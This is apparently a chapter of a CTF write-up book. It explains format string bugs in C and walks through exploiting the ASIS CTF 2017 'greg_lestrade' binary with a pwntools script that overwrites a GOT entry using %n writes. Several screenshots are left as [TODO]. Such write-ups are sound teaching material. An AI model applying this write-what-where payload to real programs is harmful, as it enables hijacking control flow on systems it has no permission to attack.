Format String Attack

The first topic I chose for this book is the format string attack, or format string exploit, where we exploit a format string bug in a C program to read from or write to memory and even execute arbitrary code. To put it simply, we smuggle our own format specifiers into a string that the program hands to a format function, and the function carries them out as if the programmer had written them.

What is it?

A format function (not to be confused with a format string) is a conversion function in C that takes a variable number of arguments, one of which is the format string. The function mainly converts primitive C data types into a human-readable string, and the format string tells it which additional arguments to read while doing so. Our exploit revolves around crafting format strings and getting them into printf (or one of its family, like fprintf, vprintf, etc.).

How does it work?

The exploit allows us to write arbitrary values to arbitrary addresses in memory (a "write-what-where"). This means we can write shellcode to an address of our choosing and steer the execution flow so the program runs it. A format function takes a number of arguments, something like this:

printf ("%d", 1337);

Here printf is the format function, %d is the format parameter, and 1337 is the argument that will be converted to decimal text and printed. The key point is that the format function always interprets the format string before it sends anything to the output.
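As a rough illustration of that "interpret first, print later" behaviour, Python's % operator follows the same conversion rules as printf for %d and %x. This is only an analogy written in Python 3, not the C function itself, and the variable names are made up for the example. The part worth noticing is the end: Python refuses to format when there are more specifiers than arguments, while C's printf has no such check and simply reads whatever sits where the next argument would be.

```python
# Python's % operator interprets the format string first, then emits text.
value = 1337
decimal_text = "%d" % value   # same conversion as printf("%d", 1337)
hex_text = "%x" % value       # same conversion as printf("%x", 1337)
print(decimal_text, hex_text)

# A format string with more specifiers than arguments (hypothetical input).
attacker_input = "%x %x %x"
error_message = None
try:
    leaked = attacker_input % ()
except TypeError as error:
    # Python counts the arguments and stops here; C's printf does not.
    error_message = str(error)
    print("Python refused:", error_message)
```

That missing check in C is the whole bug: the extra specifiers are honoured with data the programmer never meant to pass.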

To put it simply, we manipulate the function into running our command instead of its original command. That's what it means to "gain control of the execution flow".

That is the Holy Grail of all binary exploitation challenges.

And we're gonna do just that.

What can we do with it?

Our ultimate goal in every binary exploitation is to gain control of the execution flow, which means controlling the instruction pointer (EIP, RIP, or just IP). Since format string attacks let us read and write arbitrary values at arbitrary addresses, they give us exactly that opportunity. Note that we can also dump memory, partially or sometimes even completely, by peeking at the stack. Values on the stack leak through parameters such as %x, and a parameter that is passed by reference, such as %s, reads whatever the stack value points to.

Here's a handy table from a great source:

Parameter   Output                                   Passed as
%d          decimal (int)                            value
%u          unsigned decimal (unsigned int)          value
%x          hexadecimal (unsigned int)               value
%s          string ((const) (unsigned) char *)       reference
%n          number of bytes written so far (int *)   reference
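To make the "value" versus "reference" column concrete, here is a toy model in Python 3. It is not how printf is implemented: the function toy_printf, the list standing in for the stack, and the dictionary standing in for memory are all invented for this sketch. It only handles %d, %x, %s and %n, which is enough to show that %s reads from an address and %n writes to one.

```python
import re

def toy_printf(fmt, stack, memory):
    """Tiny model of printf: each specifier consumes the next stack word."""
    out = []
    position = 0
    arg_index = 0
    for match in re.finditer(r"%([dxsn])", fmt):
        out.append(fmt[position:match.start()])   # literal text before the specifier
        position = match.end()
        word = stack[arg_index]
        arg_index += 1
        kind = match.group(1)
        if kind == "d":
            out.append(str(word))                 # passed by value
        elif kind == "x":
            out.append(format(word, "x"))         # passed by value
        elif kind == "s":
            out.append(memory[word])              # word is an address: READ there
        elif kind == "n":
            memory[word] = len("".join(out))      # word is an address: WRITE the count
    out.append(fmt[position:])
    return "".join(out)

# Hypothetical memory layout: a string at 0x1000 and an integer at 0x2000.
memory = {0x1000: "secret", 0x2000: 0}
stack = [1337, 0x1000, 0x2000]

text = toy_printf("%d %s%n", stack, memory)
print(text, memory[0x2000])

# With no real arguments, %x just prints whatever words happen to be on the stack.
leak = toy_printf("%x.%x", [0xdeadbeef, 0x41414141], {})
print(leak)
```

If an attacker controls both the format string and some of the words on the stack, %s becomes an arbitrary read and %n an arbitrary write.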

Write-up Analysis

In every chapter of this collection I will always add a write-up after the basic explanation (hence the name of this book). I picked a not-so-basic format string attack example, which makes a good exercise for us.

Original write-up: https://binarystud.io/asisctf-2017-greg-lestrade-exploitation.html

Original challenge: https://drive.google.com/file/d/0ByyTnvUEO5_BemZ5T0pGd0doT2s/view?usp=sharing

Here we go

The file is compressed, so we have to extract it before we wreak havoc inside. Use the command

tar -xvf [filename]

to extract it.

Then we change the permission so we can execute the file with

chmod +x [filename] or chmod 770 [filename].

We can check what the file really is with the file command.

[TODO]

We can see that it is indeed a 64-bit ELF. Now we can try to run it.
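For the curious, the part of the file command's answer that says "ELF 64-bit" comes from the first few bytes of the file. Below is a minimal sketch in Python 3 that checks the magic number and the class and byte-order fields of an ELF header. The function name describe_elf and the sample header are made up for illustration; to inspect the real binary you would pass the first 16 bytes read from ./greg_lestrade instead.

```python
ELF_MAGIC = b"\x7fELF"
ELF_CLASS = {1: "32-bit", 2: "64-bit"}                # header byte 4 (EI_CLASS)
ELF_DATA = {1: "little-endian", 2: "big-endian"}      # header byte 5 (EI_DATA)

def describe_elf(header):
    """Summarise the identification bytes at the start of an ELF file."""
    if header[:4] != ELF_MAGIC:
        return "not an ELF file"
    word_size = ELF_CLASS.get(header[4], "unknown class")
    byte_order = ELF_DATA.get(header[5], "unknown byte order")
    return "ELF %s, %s" % (word_size, byte_order)

# Hand-written sample header, standing in for the first 16 bytes of a binary.
sample_header = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9
summary = describe_elf(sample_header)
print(summary)
```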

[TODO]

The program asks for input. The author of the original write-up tried adding format string specifiers to the input to see what would happen. The program crashed, meaning a format string vulnerability is present in the program.

Well, the first thing that comes to mind whenever I see a binary exploitation challenge is to put it on the surgery table. My favorite tool for static analysis at the moment is IDA Pro. It's really good, and it can also decompile the assembly into pseudocode, but for educational purposes I'll keep things in assembly.

[TODO]

As we can see from the previous picture, the program is indeed stripped but somehow it still retains its main function. And we'll see just that.

Of course we know from running the program earlier that it asks for an admin password. In the disassembly of main we can see that the program uses the read function to take our input from a file descriptor (here 0, which is stdin) and compares it to some variable. Although we could simply take the string from the original write-up, my intuition in this kind of case is to check where constant globals live, the .rodata section.

Or just use strings in Linux :)

[TODO]
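What strings does is simple enough to sketch: scan the file for runs of printable characters and print the ones that are long enough. The Python 3 version below is an approximation, not a reimplementation of the real tool; the function name ascii_strings and the sample bytes are invented for the demo (the password in the sample is the one used later in this chapter).

```python
import re

def ascii_strings(data, min_length=4):
    """Return runs of printable ASCII at least min_length bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_length
    return [run.decode("ascii") for run in re.findall(pattern, data)]

# Made-up blob standing in for a slice of a binary's read-only data.
sample_blob = b"\x00\x01\x02Credential : \x00ab\x007h15_15_v3ry_53cr37_1_7h1nk\x00\xff"
found = ascii_strings(sample_blob)
for item in found:
    print(item)
```

Short runs such as "ab" are dropped, which is why the real tool's output is mostly readable text rather than noise.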

Let's put it in.

[TODO]

Nice, we get in just fine! But the program sets an alarm that makes it exit after a certain period of time (I'm too lazy to look up the exact number).

One of the downsides of using the CLI instead of a GUI on Linux is that you can't copy and paste a string from the terminal. The solution is to grep the damn string and put it in a file for temporary use. Hell, anything can work in Linux. I forgot how to redirect the output into the input, so that will have to wait for another time.

Now that we're past the first gate, we must get past another one so the program invokes /bin/cat flag.txt.
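For the redirection itself, one option is to let a small script write the string to the program's standard input. The sketch below is Python 3 and uses a tiny stand-in child process (a one-line Python program that echoes what it reads) instead of the real challenge binary, so the child and its "got:" prefix are assumptions made for the demo.

```python
import subprocess
import sys

password = "7h15_15_v3ry_53cr37_1_7h1nk"

# Stand-in for the target program: reads one line from stdin and echoes it.
child_code = "import sys; sys.stdout.write('got: ' + sys.stdin.readline())"

child = subprocess.Popen(
    [sys.executable, "-c", child_code],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    universal_newlines=True,   # work with text instead of raw bytes
)
# communicate() writes our string to the child's stdin and collects its output.
reply, _ = child.communicate(password + "\n")
print(reply)
```

Swapping the stand-in command for ./greg_lestrade would feed the password to the real program the same way.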

[TODO]

Since this is just a write-up analysis and not a real life CTF scenario, I won't spend much time understanding the code because the guy already did that for us. So I'm focusing on the "how did it work" instead of "let's do it again".

To put it simply, we have to gain control of RIP so we can point it at this uncalled function. Note that this function doesn't appear in the left panel because it is never called when the program runs.

So how do we do that?

I would love to say magic again but my friend might cross my name off the team so...

Since the stack is protected, we can't use a buffer overflow to smash the stack and jump to our desired function. Instead, we will overwrite an entry in the GOT, or Global Offset Table, which holds the absolute addresses of dynamically linked functions. I will talk about the GOT in another chapter because, important as it is, the most important thing for me right now is to finish this chapter before the deadline (12 hours goes by fast when you've got something to submit). To keep it simple, the GOT is a place in memory where the addresses of library functions are stored when you run the program. So we're going to hijack that table and make one of its entries point to our flag-printing function. Simple, isn't it?
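The idea of hijacking a table of function addresses can be sketched without any binary at all. In the toy Python 3 model below, a dictionary plays the role of the GOT and the program always calls library functions through it. Every name here (real_puts, print_flag, call_via_got) is hypothetical and chosen only for illustration; the real GOT stores raw addresses, not Python functions.

```python
def real_puts(text):
    """Stand-in for the genuine library function."""
    return "puts: " + text

def print_flag(_text):
    """Stand-in for the hidden function that runs /bin/cat on the flag."""
    return "flag: (contents of the flag file would appear here)"

# The "GOT": a writable table mapping a function name to where it lives.
got = {"puts": real_puts}

def call_via_got(name, argument):
    """The program never calls puts directly; it looks the target up first."""
    return got[name](argument)

before = call_via_got("puts", "hello")
got["puts"] = print_flag            # the overwrite our exploit performs
after = call_via_got("puts", "hello")
print(before)
print(after)
```

The calling code is unchanged between the two calls; only the table entry differs, which is why a writable GOT is such an attractive target.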

The author of the original write-up is really good. His writing alone taught me a lot of the basics. The first thing we should do when we encounter a stack canary or any other stack protection is check the permissions of the GOT. Let's do it his way:

[TODO]

Fire up radare2 and open our program with it:

r2 ./greg_lestrade

The iS~got command lists the sections of the program and greps the result for "got".

Okay, we can write to it all right. See the beautiful rw written after perm.

Let's just get into it. We already found our target address with IDA Pro earlier: 0x400876. Jumping there will print the flag for us.

Oh right, to test whether we succeed, let's create a file called flag, fill it with some random words, and see if our payload prints it for us (since we're going to call /bin/cat flag).

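#!/usr/bin/env python2
from pwn import *

DEBUG = True

if DEBUG:
    # Local run: start the challenge binary as a child process.
    p = process("./greg_lestrade")
else:
    p = remote("")  # Since the web is down I don't feel the need to enter it

def main():
    # The admin password found in the binary.
    text = "7h15_15_v3ry_53cr37_1_7h1nk"

    if DEBUG:
        # Pause so a debugger can be attached before the exploit runs.
        print("Debug mode, [enter] to continue")
        raw_input()

    # Skip the banner and the password prompt.
    for i in range(3):
        print(p.readline())

    p.sendline(text)

    # Read the menu that follows a successful login.
    for i in range(2):
        print(p.readline())

    # Pick menu option 1, which takes the input we are about to abuse.
    p.sendline("1")

    p.readline()

    # Format string pieces; the addresses are the two halves of one GOT entry.
    clearGOT = "%72$n"
    writeBack = "%65123lx.%72$hn"
    writeTo1 = p64(0x602042)
    writeFront = "%2101lx.%73$hn"
    writeTo2 = p64(0x602040)

    # Pad so the format string part is exactly 0x1fe bytes long.
    formats = clearGOT + writeBack + writeFront
    padding = 'a' * (0x1fe - len(formats))
    payload = padding + formats + '\x0a\x00' + writeTo1 + writeTo2

    print(payload)

    p.sendline(payload)

    p.sendline("1")

    p.readline()

    # Discard the remaining output before the flag line.
    for i in range(3):
        p.readline()

    print(p.readline())

    p.close()

if __name__ == "__main__":
    main()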

To better understand the Python script, I'm going to explain what every line does.

The first line, called the "shebang" (most likely from "hash" or "sharp" plus "bang", the nicknames of # and !), means that our script will be run by whichever python2 the /usr/bin/env program finds on the PATH.

On the second line, we import everything from the pwn library (pwntools). Almost every binary challenge in this book will use this library as its main weapon, so you might want to learn more about it.

Next, we set the DEBUG flag to True. This means the script runs against a local copy of the program instead of the remote server.

Since we set the DEBUG flag earlier, the if branch is always taken. p = process("./greg_lestrade") starts the challenge binary as a local process and hooks our script up to its input and output. If the challenge were still up on its original server, I would use p = remote() instead, which connects our script to a remote process.

Next is our main function. I'm going to skip all the basic things for now and get into the functions from pwn library.

In the main function, we put our "admin password" string in a variable so we can use it later. As with p = process above, DEBUG is still true, so the script prints our message. raw_input() simply waits for the user to press enter before continuing.

Next we create a loop to read three lines from the process (which is our greg_lestrade challenge).

And then we send our admin password to the process.

Then we read the output just like before.

After that we send '1' as our input to the process, and read it just like before.

Here the magic begins.

The variables written there will be used on the payload. Now let's break it down:

  • clearGOT ("%72$n") stores the number of characters printed so far, as a 4-byte integer, at the address found in printf's 72nd argument, which is where writeTo1 (0x602042) ends up on the stack. Only the 'a' padding has been printed at that point, so the count is small and the upper bytes of the GOT entry are left as zero. That is the "clearing".
  • writeBack and writeFront write the address of our hidden function (the one that runs /bin/cat flag.txt), 0x400876, in two 16-bit halves. The number in front of lx (long hexadecimal) is a field width: printf pads the printed value out to that many characters, which pushes the running character count up to the number we want. %72$hn then stores the low 16 bits of that count (0x0040) as a half word at writeTo1, and after the second padded field %73$hn stores 0x0876 at writeTo2. We write in halves because printing 0x400876 characters in one go would mean over four million of them, and because the machine is little-endian the low half lives at the lower address. If you don't know what endianness or a 'word' is, please read the basics before you stray further into this abyss.
  • writeTo1 and writeTo2 are the addresses of the two halves of the GOT entry we're writing into. p64() packs the number as a 64-bit little-endian address.
  • next is the payload. This is the core weapon of this exploit. The 'a' padding brings everything before the terminator to 0x1fe bytes. The 0x0a and 0x00 are a newline character and a null terminator respectively (the author of the original write-up is exploiting the read() function, which does not stop at either). The two packed addresses come after the terminator because they contain zero bytes of their own, which would otherwise end the format string early.
  • after that, we print the payload so we can check our weapon. This is optional.
  • the next lines are just printing and reading lines.
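The arithmetic behind those numbers can be replayed offline. The sketch below, in Python 3, uses struct.pack in place of pwntools' p64 and applies the three writes to a made-up starting value for the GOT entry (the 0x7f... address is invented for illustration). It assumes each %lx field prints exactly as many characters as its width, which holds because a 64-bit value never needs more than 16 hex digits.

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes, like pwntools' p64 default."""
    return struct.pack("<Q", value)

clear_got = "%72$n"
write_back = "%65123lx.%72$hn"
write_front = "%2101lx.%73$hn"

# Number of 'a' characters printed before the first specifier.
padding = 0x1fe - len(clear_got + write_back + write_front)

printed = padding
first_write = printed               # %72$n: 4-byte count stored at 0x602042

printed += 65123 + 1                # padded hex field plus the literal '.'
high_half = printed & 0xffff        # %72$hn: 16 bits stored at 0x602042

printed += 2101 + 1                 # second padded field plus '.'
low_half = printed & 0xffff         # %73$hn: 16 bits stored at 0x602040

# Replay the writes on an 8-byte entry at 0x602040 (starting value is made up).
entry = bytearray(p64(0x00007f1234567890))
entry[2:6] = struct.pack("<I", first_write)   # clears the upper bytes
entry[2:4] = struct.pack("<H", high_half)
entry[0:2] = struct.pack("<H", low_half)
final_address = struct.unpack("<Q", bytes(entry))[0]

print(hex(padding), hex(high_half), hex(low_half), hex(final_address))
```

The running count passes 0x10000 along the way, but %hn only keeps the low 16 bits, so the two halves come out as 0x0040 and 0x0876 and the entry ends up holding 0x400876.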

There you go.

Well, since this is my first time writing this kind of thing, I will feel bad if some things aren't clear to you. For criticism and suggestions, you can hit me up by email: [email protected]
